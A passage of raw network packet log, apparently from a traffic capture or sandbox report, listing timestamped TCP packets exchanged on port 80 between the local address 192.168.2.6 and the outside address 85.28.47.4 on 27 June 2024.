                                                                Jun 27, 2024 05:58:05.375042915 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.375053883 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.375062943 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.375075102 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.375085115 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.375087023 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.375096083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.375107050 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.375128984 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.375164032 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.375649929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.375662088 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.375674009 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.375683069 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.375685930 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.375699043 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.375710011 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.375710964 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.375722885 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.375741005 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.375760078 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.376061916 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.376075983 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.376106024 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.376122952 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.378849030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.378896952 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.378923893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.378935099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.378981113 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.378981113 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.379023075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.379034042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.379045010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.379056931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.379066944 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.379087925 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.379113913 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.379281998 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.379312992 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.379406929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.379417896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.379429102 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.379440069 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.379451036 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.379451990 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.379460096 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.379471064 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.379492044 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.379502058 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.379774094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.379817963 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.379858971 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.379872084 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.379883051 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.379899025 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.379911900 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.379929066 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.380011082 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.380031109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.380043983 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.380055904 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.380057096 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.380064964 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.380068064 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.380098104 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.380409002 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.380420923 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.380430937 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.380443096 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.380448103 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.380448103 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.380455017 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.380465984 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.380475998 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.380477905 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.380507946 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.380522013 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.380853891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.380871058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.380882978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.380912066 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.380943060 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.380996943 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.381009102 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.381028891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.381036997 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.381042004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.381052971 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.381055117 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.381067038 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.381088018 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.381381989 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.381393909 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.381417990 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.381422043 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.381429911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.381439924 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.381452084 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.381452084 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.381460905 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.381464005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.381474972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.381486893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.381491899 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.381500006 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.381532907 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.382131100 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.382143021 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.382153034 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.382164955 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.382174015 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.382177114 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.382188082 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.382199049 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.382200003 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.382211924 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.382222891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.382225037 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.382234097 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.382244110 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.382245064 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.382253885 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.382256985 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.382282972 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.382306099 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.383225918 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.383235931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.383246899 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.383259058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.383270025 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.383270979 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.383281946 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.383281946 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.383295059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.383312941 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.383320093 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.383337975 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.383362055 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.451715946 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.451811075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.451822996 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.451827049 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.451834917 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.451865911 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.451880932 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.451880932 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.451960087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.451971054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.451982975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.451994896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.451998949 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.452014923 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.452034950 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.457000971 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.457060099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.457071066 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.457072020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.457098961 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.457117081 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.457228899 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.457241058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.457252979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.457268000 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.457278013 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.457299948 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.457500935 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.457540035 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.460933924 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.460985899 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.461004972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.461016893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.461045980 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.461057901 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.461229086 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.461241007 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.461251020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.461262941 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.461272001 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.461307049 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.461618900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.461630106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.461639881 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.461652040 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.461658955 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.461664915 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.461682081 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.461714029 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.461970091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.461982012 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.461992979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.462008953 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.462030888 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.462244987 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.462256908 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.462268114 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.462279081 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.462286949 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.462291002 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.462301970 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.462316036 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.462317944 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.462327003 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.462363005 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.462363005 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.462922096 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.462933064 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.462945938 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.462956905 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.462969065 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.462976933 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.462980986 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.462990999 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.463002920 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.463002920 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.463025093 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.463042974 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.463433981 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.463447094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.463458061 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.463469028 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.463481903 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.463486910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.463495016 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.463510036 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.463525057 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.463557959 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.465928078 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.466025114 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.466037035 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.466084957 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.466162920 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.466173887 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.466185093 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.466197968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.466202974 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.466228962 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.466268063 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.466453075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.466464996 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.466475964 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.466486931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.466501951 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.466516972 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.466541052 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.466713905 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.466726065 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.466736078 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.466753006 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.466766119 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.466919899 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.466932058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.466960907 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.466985941 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.467128038 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.467139006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.467149973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.467160940 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.467170954 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.467173100 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.467180967 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.467184067 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.467196941 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.467200041 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.467225075 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.467248917 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.467528105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.467538118 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.467547894 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.467560053 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.467565060 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.467571020 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.467597008 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.467611074 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.467627048 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.467648983 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.467830896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.467869043 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.467919111 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.467931986 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.467957020 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.467967987 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.468116999 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.468127966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.468137980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.468158960 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.468159914 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.468172073 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.468183994 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.468187094 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.468195915 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.468206882 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.468213081 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.468219995 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.468230009 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.468240976 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.468251944 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.468281031 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.468878031 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.468888998 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.468899012 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.468909979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.468928099 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.468950987 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.468954086 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.468962908 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.468975067 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.468985081 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.468987942 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.469018936 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.469042063 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.469434977 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.469445944 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.469456911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.469469070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.469480991 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.469491959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.469495058 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.469506979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.469520092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.469526052 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.469532013 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.469569921 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.469968081 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.469980001 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.469990969 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.470001936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.470009089 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.470014095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.470024109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.470035076 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.470036030 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.470065117 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.470082998 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.538913012 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.539028883 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.539050102 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.539096117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:05.539129972 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:05.539143085 CEST4971180192.168.2.685.28.47.4
